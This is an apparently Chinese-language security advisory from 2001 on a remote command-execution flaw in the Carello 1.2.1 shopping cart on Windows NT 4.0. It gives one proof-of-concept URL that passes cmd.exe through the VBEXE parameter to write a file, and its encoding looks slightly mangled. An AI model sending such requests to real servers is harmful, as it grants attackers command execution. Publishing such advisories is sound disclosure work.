太平洋软件Carello shopping cart存在命令可执行漏洞

发布时间：2001-05-21
更新时间：2001-05-21
严重程度：高
威胁程度：普通用户访问权限
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

Pacific Software Carello 1.2.1
   - Microsoft Windows NT 4.0SP6a
      + Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP6
      + Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP5
      + Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP4
      + Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP3
      + Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP2
      + Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
      + Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0

详细描述
远程用户可以在使用Carello shopping cart软件的主机上执行任意命令，
通过请求一特殊构造的HTTP请求会引起inetinfo.exe消耗所有系统资源，
拒绝任何连接，如果HTTP请求中有执行代码，它可以以WEB的权利执行。

测试代码
http://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe20/c20echo20test>c:\defcom.txt

解决方案
尚无

相关信息

最近严重漏洞

太平洋软件Carello shopping cart存在命令可执行漏洞